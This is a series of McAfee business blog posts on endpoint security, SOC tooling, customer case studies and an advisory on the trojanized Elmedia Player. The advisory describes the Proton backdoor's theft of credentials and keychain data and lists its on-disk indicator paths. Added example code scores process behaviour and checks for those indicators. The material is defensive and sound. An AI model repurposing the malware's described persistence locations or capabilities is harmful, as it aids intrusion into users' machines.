Industry and enterprise leaders have long called for greater visibility and efficacy in security operations. Cisco pxGrid and DXL interoperability mark the first time this has been achieved at such scale. Together this joint system provides customers with visibility and real-time security orchestration, sharing information between the network and the endpoint. Bi-directional data flow enriches integrated applications with detailed information, allowing analysts visibility into critical data such as what is on their network, current security posture, privilege levels, and more. With the two fabrics interoperating, organizations can now drive integrations with security solutions from hundreds of vendors.

McAfee teams also contributed several new projects to OpenDXL.com, including a Docker-based development environment that gets people up and running in five minutes. Companies such as MGM and AT&T have embraced the concept. Today DXL has over 3,000 customers and seven million installed clients with automated processes that can cross previously siloed tools. This allows users to efficiently and effectively manage threats by linking endpoint, network and security operation domains to close security gaps.

The Future

It may not surprise people that there is a shortage of developers in the cybersecurity industry. And as the digital world grows into new fields like artificial intelligence, and the Internet of Things puts cybersecurity squarely into our homes, the threats will also grow. We must work together as an industry.

This is just the beginning of an important movement. We are at a crossroads. We need to challenge our own beliefs.

We must empower security teams to stop spending their time on tedious integrations and manual tasks, and instead focus on defending against adversaries. Organizations should look to maximize the value of their environment with solutions that integrate. Layering new technologies that don’t speak to each other only creates gaps that adversaries can exploit. Collaboration throughout the security industry is critical to closing information gaps, breaking silos and providing the visibility we need to protect our most important assets from cybercriminals.

In short, we need to talk to each other. And the tools we develop need to talk to each other, and work together.

Are your tools open to talk?

[1] McAfee ePO study, 2018

A New Standard for Security at New Standard Corporation
Published on McAfee Blogs, Mon, 05 Feb 2018 18:30:14 +0000: https://securingtomorrow.mcafee.com/business/new-standard-security-new-standard-corporation/
From the latches on the toolbox in your garage to componentry in gigantic earth movers, New Standard Corporation provides Original Equipment Manufacturer components, assemblies, and related services for products used in the agriculture, construction, mining, industrial, and power generation industries. As at companies everywhere, New Standard has seen information security move from the back shelf to the boardroom in recent years.

New Standard Network Administrator Chad Johnson has experienced the shift firsthand. “Years ago, I would never hear from the C-suite or a VP about whether we are doing enough to secure our data, prevent loss, and prevent hacking,” attests Johnson, who oversees all facets of networking, infrastructure, and telephony at the company’s three manufacturing facilities in Pennsylvania and North Carolina. “The Equifax breach definitely helped raise awareness.”

New Standard Corporation has built a reputation of trust and reliability with major OEMs across multiple industries, so cybersecurity is crucially important to the company. The company’s approach to collaborative engineering and custom OEM manufacturing enables it to offer industry-leading solutions, while taking every measure to ensure complete confidentiality.

That approach has led the company to invest in security infrastructure. New Standard has relied on McAfee® endpoint protection for more than a decade, and recently migrated to McAfee Endpoint Security. The company also added McAfee Web Gateway appliances and McAfee Threat Intelligence Exchange. As a result, Johnson’s day-to-day activities and approach to security have evolved significantly. “Prior to implementing McAfee Endpoint Security and McAfee Web Gateway, our security was essentially event-driven and reactive,” explains Johnson. “We just waited to be notified of an infection on an endpoint.”

“With McAfee Web Gateway filtering at the edge for malware, suspicious content, and web reputation, and with McAfee Endpoint Security and McAfee Threat Intelligence Exchange sharing threat information back and forth, we have become much more proactive,” continues Johnson. “We’re now automatically examining file reputation on all endpoints and cross-referencing unknown files with the McAfee GTI cloud. The number of threats that make it to the endpoint has plummeted, as has the amount of time we spend remediating infected systems.”

Managing Security by Exception

“I manage by exception now,” says Johnson, who looks at the McAfee ePolicy Orchestrator® (McAfee ePO™) central console about an hour each day. “I still look at reports daily, and occasionally validate that all the automated responses we’ve put in place with McAfee are working… but incident response has been fantastic. Today most of my time in McAfee ePO is proactive—for instance, looking for file anomalies or potentially suspicious behavior.”

Johnson particularly appreciates the modular architecture of the McAfee Endpoint Security framework introduced last year. “I love the module approach, where you can deploy specific pieces and leverage only what you want,” says Johnson. “Modularity lets us more easily modify our security profile over time. With this platform, we are looking to add a lot of additional functionality and security for our desktop and mobile users.”

With the switch from reactive to more proactive security, New Standard has felt more comfortable embracing bring-your-own-device policies for employees. “We have a lot more peace of mind now regarding users working outside the firewall and on their own devices,” says Johnson.

Looking to the Cloud and Beyond

Looking forward, Johnson is most excited about the company’s upcoming deployment of McAfee Advanced Threat Defense (McAfee ATD) sandboxing appliances and integration with McAfee Threat Intelligence Exchange across all endpoints. “Given what I’ve seen [in our testing] so far, I believe McAfee ATD will dramatically reduce our potential risk for a zero-day outbreak,” says Johnson.

Extending endpoint security to the Cloud and leveraging OpenDXL are also on New Standard’s security roadmap. After attending MPOWER, the McAfee user conference in October in Las Vegas, Johnson left excited about the direction McAfee is taking its endpoint security platform and how it is working with other security vendors to mitigate threats for its customers.

For Johnson, the dynamic nature of his job is one of the reasons he keeps coming back to work each day. “You’re always going to be learning in the technology industry. It changes year over year,” he says. So, even when the toolbox latch or manufacturing component looks the same as it did the previous year, the security behind them keeps evolving. So does McAfee.

Please watch our video of Chad Johnson talking about his experience with McAfee below. Get your questions answered by tweeting @McAfee_Business.

A Leader-Class SOC: The Sky’s the Limit https://securingtomorrow.mcafee.com/business/security-operations/leader-class-soc-skys-limit/ Wed, 06 Dec 2017 19:44:17 +0000

This blog was written by Jason Rolleston.

This has been quite a year for McAfee, as we not only roll out our vision, but also start to fulfill that vision.

We’ve established our world view: endpoint and cloud as the critical control points for cybersecurity and the Security Operations Center (SOC) as the central analytics hub and situation room. While we’ve talked a lot about endpoint and cloud over the past year, we’ve only recently started exposing our thinking and our innovation in the SOC, and I would like to delve a bit deeper.

SOCs provide dedicated resources for incident detection, investigation, and response. For much of the past decade, the SOC has revolved around a single tool, the Security Incident and Event Manager (or SIEM). The SIEM was used to collect and retain log data, to correlate events and generate alerts, to monitor, to report, to investigate, and to respond. In many ways, the SIEM has been the SOC.

However, in the past couple of years, we’ve seen extensive innovation in the security operations center. This innovation is being fueled by an industry-wide acceptance of the increased importance of security operations, powerful technical innovations (analytics, machine learning), and the ever-evolving security landscape. The old ways of doing things are no longer sufficient to handle increasingly sophisticated attacks. We need to do something different.

McAfee believes this next-generation SOC will be modular, open, and content-driven.

And automated. Integration of data, analytics, and machine learning are the foundations of the advanced SOC.

The reason for this is simple: increased volume. In the last two years, companies polled in a McAfee survey said the amount of data they collect to support cybersecurity activities has increased substantially (28%) or somewhat (49%). There are important clues in all that data, but the new and different attacks get lost in the noise. Individual alerts are not especially meaningful – patterns, context, and correlations are required to determine potential importance, and these constructs require analytics – at high speed and sophistication, with a model for perpetually remaining up to date as threat actors and patterns change. We need the machines to do more of the work, freeing the humans to understand business-specific patterns, design efficient processes, and manage the policies that protect each organization’s risk posture.

SIEM remains a crucial part of the SOC. The use cases for SIEM are extensive and fundamental to SOC success: data ingestion, parsing, threat monitoring, threat analysis, and incident response. The McAfee SIEM is especially effective at the high-performance correlations and real-time monitoring that are now mainstream for security operations. We are pleased to announce that McAfee has been recognized for the seventh consecutive time as a leader in the Gartner Magic Quadrant for Security Information and Event Management.* And we’re not stopping there — we’re continuing to evolve our SIEM with a high-volume, open data pipeline that enables companies to collect more data without breaking the bank.

An advanced SOC builds on a SIEM to further optimize analytics, integrating data, and process elements of infrastructure to facilitate identification, interpretation, and automation. A modular and open architecture helps SOC teams add in the advanced analytics and inspection elements that take SOCs efficiently from initial alert triage through to scoping and active response.

Over the past year, we’ve worked extensively partnering with over eight UEBA vendors to drive integration with our SIEM. At our recent customer conference in Las Vegas, MPOWER, we announced our partnership with Interset to deliver McAfee Behavioral Analytics. Look for more information about that in the new year. I also want to reinforce our commitment to being open and working with the broader ecosystem in this space, even as we bring an offer to market. No one has a monopoly on good ideas and good math – we’ve got to work together. Together is Power.

We also launched McAfee Investigator at MPOWER, a net new offering that takes alerts from a SIEM and uses data from endpoints and other sources to discover key insights for SOC analysts at machine speed. Leveraging machine learning and artificial intelligence, McAfee Investigator helps analysts get to high quality and accurate answers, fast.

The initial response is great: we’ve seen early adopter customers experience a 5-16x increase in analyst investigation efficiency. Investigations that took hours are taking minutes. Investigations that took days are taking hours. Customers are excited and so are we!

In short – we have a lot cooking in the SOC and we are just getting started.

Look for continued fulfillment of McAfee’s vision in 2018. The sky’s the limit.

Cheers,

Jason


*Gartner Magic Quadrant for Security Information and Event Management, Kelly M. Kavanagh, Toby Bussa, 4 December 2017. From 2015-16, McAfee was listed as Intel Security, and in 2011, McAfee was listed as Nitro Security since it acquired the company in 2011.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

McAfee and Amazon Web Services: A Secure Relationship https://securingtomorrow.mcafee.com/business/mcafee-amazon-web-services-secure-relationship/ Fri, 17 Nov 2017 22:00:03 +0000

This blog post was written by Raja Patel.

As enterprises continue their journey to the cloud, many are using a hybrid model that engages both the private and public cloud.  McAfee has embraced this “hybrid cloud” strategy to enable companies to migrate to the public cloud, and we are investing in the tools and relationships to enable the transition. Working with Amazon Web Services (AWS) is an important part of bringing enterprise-level security to public cloud deployments, and I’m happy to announce two new partner relationships with AWS. Also, McAfee will be joining AWS at the AWS re:Invent Expo in Las Vegas in late November, where we will demonstrate products that customers can use in their hybrid cloud strategy.

McAfee is Now an APN Advanced Technology Partner

For enterprise engagements, McAfee has become an Amazon Partner Network (APN) Advanced Technology Partner. To become an APN Advanced Technology Partner we have demonstrated that our products, customer relationships, expertise and overall business investments on AWS have grown and are meaningful to AWS.

McAfee builds tools that automate the rollout of security controls and security operations consistently across organizations. Our solutions — such as Virtual Network Security Platform, Cloud Workload Security, and Web Gateway — can play significant roles in helping companies adopt AWS securely:

McAfee Virtual Network Security Platform (vNSP): Designed specifically for fully virtualized public and private clouds, vNSP delivers an elastic security control that provides comprehensive network inline intrusion prevention, application protection, zero-day threat detection and visibility into lateral attack movement. The scalable and highly distributed architecture has been certified as “Well Architected” by Amazon. Integration with orchestration and automation frameworks makes this an ideal solution for adoption in DevSecOps environments.

McAfee Cloud Workload Security (CWS): As data center parameters get redefined, the ability to navigate current datacenter workload assets and plot the journey to the cloud requires a map that will safely show the way. Cloud Workload Security provides visibility and protection for your workloads in the cloud with agility and confidence through an integrated suite of security technologies, ensuring control of new parameters.

McAfee Web Gateway (MWG): With its best-in-class malware protection efficacy and policy flexibility, we now have the ability to deploy MWG directly in AWS. This is in addition to the appliance model and SaaS deployment model. MWG boasts the most flexible options in the industry for Web security. With an AWS deployment, customers can not only offload workload from on-premise appliances through hybrid policy enforcement, they can also provide advanced in-line malware detection for SaaS-based apps. This is the same value proposition that McAfee has historically offered for endpoint protection, but we are now able to offer it for SaaS-based applications as well.

To learn more about our solutions that keep you better protected on AWS, visit mcafee.com/ProtectAWS.

McAfee Accepted into the AWS Public Sector Partner Program

In addition to the commercial sector, McAfee knows that Government, Education and Nonprofit customers need quality security in the cloud. AWS has accepted McAfee into its AWS Public Sector Partner Program. This designation reflects McAfee’s strong commitment to support public sector customers in their transition to the cloud. As our presence in the AWS Public Sector Partner Program grows, so too will the value of our solutions specifically targeted for the public sector.

McAfee is a Sponsor at AWS re:Invent

Join us the week of November 27th at the AWS re:Invent event in Las Vegas. Visit the McAfee booth (Booth 1238) at the Venetian. McAfee experts will share strategies and best practices to help customers secure and manage data on AWS. Plus, you can see live how McAfee vNSP expands network protection across virtualized environments.

Make sure to stop by the booth to say hello in person, or via Twitter.

To find out more about our programs, certifications, qualifications, and technologies supporting AWS, click here.

Cheers,

When it Comes to Malware, Actions Can Speak Louder than Words https://securingtomorrow.mcafee.com/business/malware-actions-speak-louder-than-words/ Fri, 17 Nov 2017 21:00:59 +0000

This blog post was written by Raja Patel.

At some point as a child, a parent likely told you, “actions speak louder than words.” It’s a good life lesson—and it can hold just as true when fighting malware.

Cybercriminals have become extremely skilled at disguising the true nature of malware attacks. The best way to protect your users is to employ a layered approach that includes both pre- and post-execution analysis. You can learn a lot by evaluating what an unknown file “says” it is. But sometimes, the only way to stop advanced malware is to observe what it does once it crosses your threshold.

Journey through the Anti-Malware Funnel

To understand how pre- and post-execution anti-malware tools work together, imagine you’re running a grocery store and you have a problem with shoplifters. The thieves look just like other customers. How do you tell the good shoppers from the bad? Organizations are tasked with solving a similar problem in protecting against malware disguised to look like harmless application traffic.

Legacy signature-based antivirus plays an early role, filtering out large numbers of known attacks. Going to our grocery store analogy, this is like denying entry to all shoppers who’ve been caught before, who have their picture hanging on the wall of the manager’s office. It’s an important security measure, but it won’t stop thieves you’ve never seen before or those in disguise who no longer look the same.

At the next level of the funnel, McAfee Real Protect pre-execution scanning applies sophisticated statistical analysis and machine learning techniques to unknown “greyware” files. These scans compare static code attributes (source code language or compiler used, linked DLLs, and other static features) against known threats, without signatures. Returning to our analogy, this is comparable to, say, facial recognition software that catches anyone entering the store with a criminal record of shoplifting, even if they’ve never been there before.

Static scanning catches a huge amount of malware, even if it’s well disguised. But as we know, cybercriminals don’t just give up when new defenses emerge. They develop new techniques (like packing, polymorphism, and metamorphism) to slip past them. (In our analogy, these would be the savviest shoplifters who, for example, dress up like a vendor making deliveries, or get someone with a clean record to shoplift for them.) To stop threats like these, you sometimes have to go deeper: watching what the greyware actually does.

Analyzing Malware Actions

McAfee offers two post-execution tools to catch the most cleverly disguised malware—the kind that makes it past even advanced pre-execution scanning. These are:

  • Real Protect Dynamic: This layer uses machine learning to analyze the file’s actual behavior as it executes. If the file attempts to do things that malware often does, such as create child processes, drop or alter files, or reach out to known bad networks, Real Protect can convict it as malicious in seconds.
  • Dynamic Application Containment: While other parts of the anti-malware funnel attempt to analyze and understand greyware, this layer takes a “contain first, limit the impact” approach. Based on the context and reputation of the greyware, Dynamic Application Containment (DAC) makes a determination to limit or eliminate its ability to make malicious changes on the endpoint. The threshold for triggering DAC is fully configurable. Once DAC is triggered, McAfee Endpoint Security uses Arbitrary Access Control (AAC) technology to isolate the execution profile of a process. It then detects any potentially malicious behavior, such as access violations, memory scanning, signs of persistence, proxy attacks on legitimate applications, etc. If the parent process violates any of the containment rules, DAC as a protective component blocks and/or reports on the actions that the malware had attempted to perform, preventing a “patient-zero” infection. The entire analysis is performed without having to configure any blacklists or whitelists, and without having to detonate the file in an execution sandbox.

In our hypothetical grocery store, post-execution tools are the equivalent of having a surveillance team watching every inch of the premises and stepping in the moment someone tries to steal or demonstrates a sufficient level of suspicious behavior to summon the attention of store security. You’re not necessarily preventing every shoplifter from entering the store, but you’re ensuring that they can’t do much damage once inside.
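As an added illustration (not McAfee’s code, and not a description of how Real Protect Dynamic or DAC are implemented), the Python sketch below scores a constructed process-event trace against the behaviors named above (child processes, dropped or altered files, connections to known-bad networks) and shows a “contain first” decision driven by a reputation threshold. The event fields, weights, thresholds, and the denylist are all assumptions made for the example.

```python
import ipaddress
from collections import defaultdict

# Constructed trace of the kind a post-execution monitor might emit for one
# unknown ("grey") process and the child it spawns. Field names are hypothetical.
TRACE = [
    {"pid": 100, "op": "exec",    "target": "C:\\Users\\a\\invoice.exe"},
    {"pid": 100, "op": "spawn",   "target": "powershell.exe", "child": 101},
    {"pid": 101, "op": "write",   "target": "C:\\Users\\a\\AppData\\Roaming\\x.dll"},
    {"pid": 101, "op": "modify",  "target": "C:\\Users\\a\\Documents\\q3.xlsx"},
    {"pid": 101, "op": "connect", "target": "198.51.100.7:443"},
    {"pid": 100, "op": "write",   "target": "C:\\Users\\a\\AppData\\Local\\Temp\\s.tmp"},
]

# Constructed denylist (RFC 5737 documentation range) standing in for a
# reputation feed of known-bad network destinations.
KNOWN_BAD_NETWORKS = {"198.51.100.0/24"}

# Assumed weights for the behaviors the post names; tuned values are a policy choice.
WEIGHTS = {"child_process": 2, "file_drop": 2, "file_alter": 3, "bad_network": 4}
CONVICT_AT = 6       # behavior score at which the root process is convicted
CONTAIN_BELOW = 50   # reputation (0-100, lower is worse) below which we contain first


def build_tree(trace):
    """Map every pid in the trace to the root process it ultimately descends from."""
    parent = {ev["child"]: ev["pid"] for ev in trace if ev["op"] == "spawn"}

    def root(pid):
        while pid in parent:
            pid = parent[pid]
        return pid

    return {ev["pid"]: root(ev["pid"]) for ev in trace}


def in_bad_network(dest):
    """True if the host part of 'ip:port' falls inside a denylisted network."""
    host = dest.rsplit(":", 1)[0]
    addr = ipaddress.ip_address(host)
    return any(addr in ipaddress.ip_network(net) for net in KNOWN_BAD_NETWORKS)


def classify(ev):
    """Translate one raw event into a named suspicious behavior, or None if benign."""
    if ev["op"] == "spawn":
        return "child_process"
    if ev["op"] == "write":
        return "file_drop"
    if ev["op"] == "modify":
        return "file_alter"
    if ev["op"] == "connect" and in_bad_network(ev["target"]):
        return "bad_network"
    return None


def score_trace(trace):
    """Accumulate behavior scores per root process, crediting child activity to the parent."""
    root_of = build_tree(trace)
    scores = defaultdict(int)
    seen = defaultdict(set)
    for ev in trace:
        behavior = classify(ev)
        if behavior:
            root = root_of[ev["pid"]]
            scores[root] += WEIGHTS[behavior]
            seen[root].add(behavior)
    return {
        root: {"score": s, "behaviours": sorted(seen[root]), "convicted": s >= CONVICT_AT}
        for root, s in scores.items()
    }


def containment_plan(trace, root_pid, reputation):
    """'Contain first': with poor reputation, list the file and network actions of the
    process tree that would be blocked instead of executed; otherwise only monitor."""
    if reputation >= CONTAIN_BELOW:
        return {"mode": "monitor", "blocked": []}
    root_of = build_tree(trace)
    blocked = [
        f"pid {ev['pid']}: {ev['op']} {ev['target']}"
        for ev in trace
        if root_of[ev["pid"]] == root_pid and ev["op"] in ("write", "modify", "connect")
    ]
    return {"mode": "contain", "blocked": blocked}


if __name__ == "__main__":
    verdicts = score_trace(TRACE)
    for pid, v in verdicts.items():
        print(f"pid {pid}: score={v['score']} convicted={v['convicted']} {v['behaviours']}")
    # Low reputation: the same trace is contained before it can do damage.
    print(containment_plan(TRACE, 100, reputation=30))
```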

Multi-Layered Defense

If it sounds like there’s a tradeoff here, there is. Pre-execution scanning can prevent most malware from ever executing on endpoints—but it may miss some advanced attacks. Post-execution tools stop malicious behavior before it causes significant damage—but the file does execute on the system before they take action.

Neither method, on its own, will stop every attack or peel away every obfuscation technique. But working together as part of a multi-layered defense strategy, they provide powerful protection against the most sophisticated malware threats.

As in our hypothetical store, preventing threats is no longer about posting pictures and hoping someone spots a thief; it’s about ensuring that the tools to spot the would-be criminals you have yet to identify are in place. The good news is that with McAfee endpoint defenses, it’s possible to see more, stop more and do less thanks to tightly integrated defenses with a single management console.

Learn More

McAfee can help you detect and respond to advanced threats more quickly, with less time and effort. Learn more about our Dynamic Endpoint Threat Defense solution and follow us on Twitter at @McAfee.


Securing Victoria’s Secret’s Secrets — Defending Data and Operations to Support Global Fashion Brands https://securingtomorrow.mcafee.com/business/securing-victoria-secrets-secrets-defending-data-operations-support-global-fashion-brands/ Fri, 17 Nov 2017 15:00:29 +0000

You’ve probably heard of Victoria’s Secret. And Calvin Klein, Gap, Lands’ End, Marks & Spencer, and Tommy Hilfiger. But you may have never heard of Brandix, one of the largest apparel suppliers to these and other top retail fashion brands. Sri Lanka’s largest apparel exporter, the Brandix Group employs approximately 48,000 people across 42 sites in Sri Lanka, India, Bangladesh, and the Dominican Republic.

In the global apparel industry, Brandix’s reputation as a top supplier of quality clothing has been rising rapidly along with its export volume. For the past five years, Brandix has been lauded as Sri Lanka’s Exporter of the Year (by the Sri Lankan Export Development Board). This surge in recognition has led to rapid growth, and with it, additional security risk.

“With the success and growth of our business, we knew we needed to take information security to the next level,” says Manager of Microsoft Technologies Janaka Sampath, who oversees endpoint protection across the extended Brandix enterprise. Management concurred and even mandated bolstering cyber defenses, but desired to keep the information security team small.

So that was Janaka’s challenge: How could he pull together multiple security tools such as endpoint solutions with machine learning and detailed threat analytics in a security operations center run by a small team?

Tempted by Newer Endpoint Solutions but Won Over by McAfee

Although Brandix had used McAfee® antivirus solutions to protect endpoints for years, the newer endpoint protection products began to catch Janaka’s attention because they do not rely on signatures for detection. After a thorough evaluation, however, he concluded that sticking with McAfee for endpoint protection still made the most sense given that McAfee recently introduced McAfee Endpoint Security. In Janaka’s mind, the new solution was a tremendous leap forward in endpoint protection, one that “goes well beyond signature-based detection.” The addition of Dynamic Application Containment (DAC) functionality and Real Protect machine learning technology, in particular, helped sway the decision.

Without its users even noticing, Brandix seamlessly migrated the antivirus engine of the McAfee Complete Endpoint Protection Advanced suite—McAfee VirusScan® Enterprise—to the McAfee Complete Endpoint Threat Protection Suite. The company also deployed the Adaptive Threat Prevention module option, which provides DAC and Real Protect. Janaka is first running DAC in “productivity mode,” fine-tuning and teaching it to avoid false positives before moving to “balance mode.” Implementation of Real Protect will follow. The impact of DAC and Real Protect has been impressive in the company’s tests using malware and greyware samples and mutations of samples. “In our simulations, McAfee Endpoint Security has detected and blocked ransomware and zero-day threats very effectively,” says Janaka.

Integrated Security Framework Boosts Security to Next Level

In addition to McAfee Endpoint Security, Brandix decided to implement McAfee Threat Intelligence Exchange and McAfee Advanced Threat Defense (McAfee ATD) to take advantage of each solution’s integration via the Data Exchange Layer (DXL), an open-source platform that connects security components for real-time data exchange without requiring point-to-point API connections. Now when a Brandix endpoint encounters a suspicious or malicious file, that information is immediately conveyed to McAfee Threat Intelligence Exchange, which compares it to its reputation database, and, if no match is found, immediately sends it to McAfee ATD for analysis. If McAfee ATD concludes the file is malicious, that information is instantly shared with all systems in the environment connected via DXL—including all other endpoints.

“Aggregating and sharing threat intelligence that has been gathered at various levels from a range of sources significantly enhances our security posture,” explains Janaka. “With McAfee Threat Intelligence Exchange and our integrated security platform, we can respond to threats much more quickly and mitigate risk more effectively. For instance, if a user attempts to download, knowingly or unknowingly, a file that violates our security policy or causes suspicious activity detected by McAfee Endpoint Security, we can immediately blacklist the file and prevent it from executing anywhere in our highly distributed environment.”

Improved Security Without a Huge Hassle or Increased Operational Overhead

Using the McAfee ePolicy Orchestrator® (McAfee ePO™) central console, Janaka and his small team at headquarters can manage all three McAfee solutions—McAfee Complete Threat Protection Suite, McAfee Threat Intelligence Exchange, and McAfee Advanced Threat Defense—as well as McAfee DLP Endpoint (to prevent data leakage). From a single pane of glass, they set security policies and push them out to the company’s sites worldwide. Small remote teams at each of the company’s major sites also use McAfee ePO software to monitor day-to-day security in their respective environments. Because McAfee ePO software simplifies and consolidates security administration so much, Brandix needed no additional staff to augment its security arsenal and fortify its security posture.

Just as Brandix works behind the scenes to support global retail brands, McAfee integrated security works in the background at Brandix to keep data and operations secure so the company can focus on its core business. “The biggest benefit of our decision to go with McAfee Endpoint Security and the McAfee integrated security platform,” says Janaka, “is that it takes our security to the next level without a huge hassle.”

To read the full case study, click here. Follow @McAfee_Business to learn more about our enterprise security solutions.

10 Ways to Bring your Incident Response Back from the Grave https://securingtomorrow.mcafee.com/business/10-ways-bring-incident-response-back-grave/ Wed, 01 Nov 2017 04:00:58 +0000

This blog was written by Barbara Kay.

It’s Día de Los Muertos—but that’s no excuse for your security threat processes to move like the walking dead. As hundreds of thousands of people around the globe take time to remember their ancestors today, we urge you to look back through your incident history. But don’t stop there, think about how you can improve and accelerate deadly response times.

You might be thinking: easier said than done. I might as well send that goal to join the graveyard of good intentions. But you’d be doing yourself a disservice, as ‘quelling the dwell’ is more possible to put into action than you think.

So, grab a candy sugar skull, and get ready to accelerate your detection and response time with our ten simple tips:

1. No Vacations From Integrations.

Products that don’t work together are working against each other, and are a major road-block in the race to detect and respond. If your security products don’t talk to one another, you could be missing the full picture—and a breach. Integrating your detection and response systems and tools can ensure communication with the right context to speed time to detection and containment.

2. You Don’t Need a Soothsayer to Understand Scope.

It’s no surprise security professionals say that determining security incident impact and scope takes a lot of time. Many often underestimate how many servers, applications, and devices are in their organization. By implementing centralized security management, you get the visibility and monitoring you need. Per Aberdeen, if you cut time to detection and response in half, you can reduce the impact of a data breach by 30 percent and the impact on enterprise resources by 70 percent. That competitive advantage begins when you learn to understand your entire environment.

3. Keep Your Eyes on the Prize—Data.

Do you know what your data looks like on a regular basis? If not, it’s nearly impossible to realize when anomalous activity creeps into your system. Establish a baseline for your data using a solution that continually monitors traffic.

4. Vanquish Attacks with Practiced Prioritization.

Triage is the key during an attack. You must know your most critical assets, know when to sound alarms, and have structured investigation workflows and cross-functional communications already in place. Plan so that you will save precious time defending your organization’s most important assets when they come under attack.

5. This is Not a Drill!

It’s mandatory for your company to conduct fire drills…but did you know only 33 percent of companies are running regular security breach drills? This is not a drill, people! Putting response procedures to the test identifies security gaps before breaches occur. Simulating breaches, conducting drills, or hiring a penetration testing firm to attack you from outside are all ways to test your ability to stop a breach.

6. Regulate Outside Access to Your Company.

Think of your company as the coolest VIP party in town, the one only a few invite-only guests with a gold key are allowed access to. Most breaches begin with third-party suppliers, partners, or cloud providers. Ensure that every entity connected to your network environment, without exception, adheres to your security policies. Also, set privilege, time, and location controls to make certain partners can access only prescribed systems and data.

For the remainder of the tips, download our white paper or infographic.

For more information follow us on Twitter at @McAfee and @McAfee_Business.

The post 10 Ways to Bring your Incident Response Back from the Grave appeared first on McAfee Blogs.

When Your Media Player Watches You – Trojan Infects Software Downloads for Macs
https://securingtomorrow.mcafee.com/business/when-your-media-player-watches-you-trojan-infects-software-downloads-for-macs/
Wed, 25 Oct 2017 22:45:58 +0000

The post When Your Media Player Watches You – Trojan Infects Software Downloads for Macs appeared first on McAfee Blogs.

Users downloading a media player to watch videos on their Macs ended up being watched by cybercriminals using Trojan malware to spy on victims’ operating systems.

Unfortunately, that’s the case for the popular Mac OSX media player, Elmedia Player. A trojanized version of the program has hit the scene as a result of the developer’s servers being hacked by cybercriminals.

It all started when a Remote Access Trojan (RAT), named Proton, snuck into the developer’s servers via a breach in their JavaScript library. From there, the threat was able to live on the developer’s official site for a period of time. Seemingly completely legitimate, the trojanized player was ready for download, which translates to: ready to infect any innocent user who stumbled across it.

The compromised package was created in order to deliver the latest version of the Proton backdoor on a broad scale. Proton is a Trojan that poses as legitimate programs or files, such as Elmedia Player, in order to trick and entice users into unknowingly running it. Upon being launched, the Proton backdoor provides attackers with an almost full view of the compromised system, allowing the theft of browser information, keylogs, usernames and passwords, cryptocurrency wallets, macOS keychain data and more.

Users have been warned that if they downloaded the software prior to the October 19th disclosure (after which Eltima Software removed the program from the site), they run the risk of having their system infected by the malware. And since Elmedia boasts over one million users, it’s crucial we all start looking towards next steps.

Users can start by seeing if any of the following files or directories are on their system, which would mean the trojanized version of Elmedia Player has been installed:

  • /tmp/Updater.app/
  • /Library/LaunchAgents/com.Eltima.UpdaterAgent.plist
  • /Library/.rand/
  • /Library/.rand/updateragent.app/

If a user is in fact infected, the next step is a full OS re-installation. And for Elmedia Player users who wish to run the program safely once more, fear not. Users can now download a clean version of Elmedia Player from the Eltima website, which is said to now be free of compromise.
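The file check described above can be scripted so it runs the same way on every Mac in a fleet. The following is an added example, not code from the McAfee post or from Eltima: a POSIX shell script that tests for the four artefacts the post lists. The optional root prefix (and the ELMEDIA_ROOT variable) is an assumption added here so the check can be pointed at a mounted disk image or a scratch directory instead of the live root filesystem.

```shell
#!/bin/sh
# Added example, not from the McAfee post or from Eltima: check a macOS
# host for the on-disk artefacts the post associates with the trojanized
# Elmedia Player / Proton backdoor.

# The four paths listed in the post (trailing slashes dropped so a plain
# existence test works for files and directories alike).
ELMEDIA_PROTON_IOCS="/tmp/Updater.app
/Library/LaunchAgents/com.Eltima.UpdaterAgent.plist
/Library/.rand
/Library/.rand/updateragent.app"

# count_elmedia_iocs [ROOT]
# Prints to stdout how many of the listed artefacts exist under ROOT and
# reports each hit on stderr. ROOT defaults to "" (the live filesystem);
# passing a mount point or scratch directory is an assumption added here so
# the check can also be run against an offline image.
count_elmedia_iocs() {
    root="${1:-}"
    n=0
    for p in $ELMEDIA_PROTON_IOCS; do
        if [ -e "${root}${p}" ]; then
            printf 'FOUND: %s\n' "${root}${p}" >&2
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# check_elmedia_iocs [ROOT]
# Exit status 0 when none of the artefacts are present, 1 otherwise, so the
# function can be used directly in an if statement or a fleet-wide job.
check_elmedia_iocs() {
    [ "$(count_elmedia_iocs "${1:-}")" -eq 0 ]
}

# Stand-alone run: ELMEDIA_ROOT is an assumed environment variable; leave it
# unset to check the live system.
if check_elmedia_iocs "${ELMEDIA_ROOT:-}"; then
    echo "No Elmedia/Proton artefacts found."
else
    echo "Artefacts present: treat the host as compromised; the post advises a full OS re-installation." >&2
fi
```

A clean result only means these four paths are absent; it does not prove the host was never infected, so hosts that ran the download before October 19th should still be treated with suspicion.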

To learn more about this Trojan, and others like it, be sure to follow @McAfee and @McAfee_Business.

Safe Soaring: McAfee Advances Customer Success with Integrated Analytics, Ecosystems, and Experiences at MPOWER
https://securingtomorrow.mcafee.com/business/safe-soaring-mcafee-advances-customer-success-integrated-analytics-ecosystems-experiences-mpower/
Wed, 18 Oct 2017 20:01:24 +0000

The post Safe Soaring: McAfee Advances Customer Success with Integrated Analytics, Ecosystems, and Experiences at MPOWER appeared first on McAfee Blogs.

This blog was written by Barbara Kay.

Security embodies the analogy of fixing a plane in flight. Every company has some variety of security people, process, and technology in place already. So, like a plane in flight, your security infrastructure needs an operational model that can be updated, adapted, repaired, or serviced while it is actively at work protecting your business infrastructure.

A successful model must accommodate several inconvenient truths. Security systems are not set-and-forget, nor does any product or service exist in a vacuum. There’s no single vendor. The people-process-technology trifecta takes a sound, extensible architecture and continual nourishment to support healthy and secure enterprise operations.

These truths are fundamental to the McAfee threat defense lifecycle model and human-machine teaming vision, which received new support this week in Las Vegas at the MPOWER Cybersecurity Summit. Here’s an overarching view and examples of the 360-degree approach McAfee is taking for customer success. We are innovating in products, in industry collaboration, in cloud enablement, and in the customer relationship model.

Innovating in Analytics

Multiple new and updated products increase the precision, efficiency, and efficacy of defenses and security operations through new analytics based on machine learning, artificial intelligence, and really smart people in our Foundstone consulting practice and McAfee Labs.

  • New McAfee Investigator solution applies advanced analytics to increase SOC productivity
  • Deep Learning integrated into McAfee Endpoint Security, leveraging knowledge gleaned from both pre- and post-execution review
  • New McAfee innovations feature ransomware decryption and a new “stegware” or steganography detection initiative

